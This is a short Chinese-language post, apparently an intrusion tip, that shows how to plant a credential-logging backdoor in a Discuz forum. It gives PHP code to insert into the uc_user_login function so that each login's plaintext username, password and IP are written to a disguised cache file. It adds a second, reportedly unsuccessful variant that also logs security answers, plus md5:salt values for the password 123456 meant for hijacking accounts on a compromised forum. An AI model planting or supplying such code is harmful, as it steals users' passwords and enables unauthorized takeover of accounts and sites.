修改uc_client目錄下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上程式碼,在網站./data/cache/目錄下自動生成csslog.php
if(getenv('HTTP_CLIENT_IP')) { 
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) { 
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) { 
$onlineip = getenv('REMOTE_ADDR');
} else { 
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
    $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>使用者：".$username." 密碼：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
    $handle=fopen('./data/cache/csslog.php','a+');

    $write=fwrite($handle,$record);

網上還有一種方法:

//開啟source/function/function_member.php
 
//找到function userlogin
 
//在return $return;前面加上
 
$a=file_get_contents(dirname(__FILE__).’/1.txt’);
 
file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id：”.$username.”—-Psw：”.$password.”—-question：”.$questionid.”—-Answer：”.$answer.”\r\n”);
 
//記錄登陸成功的賬號密碼以及問題答案！儲存在source/function/目錄下的1.txt
 
經過測試沒有成功。

幾組密碼為123456的md5和salt值，供滲透discuz論壇修改密碼用：

f9b6a0a1825adc0e5bb77e7daa010793:795da2 
217fee1a3b9c657236d0ed636f2ed36b:c7be77 
85f71aa1e34154bb8a6a8f8183c2a781:1bffdc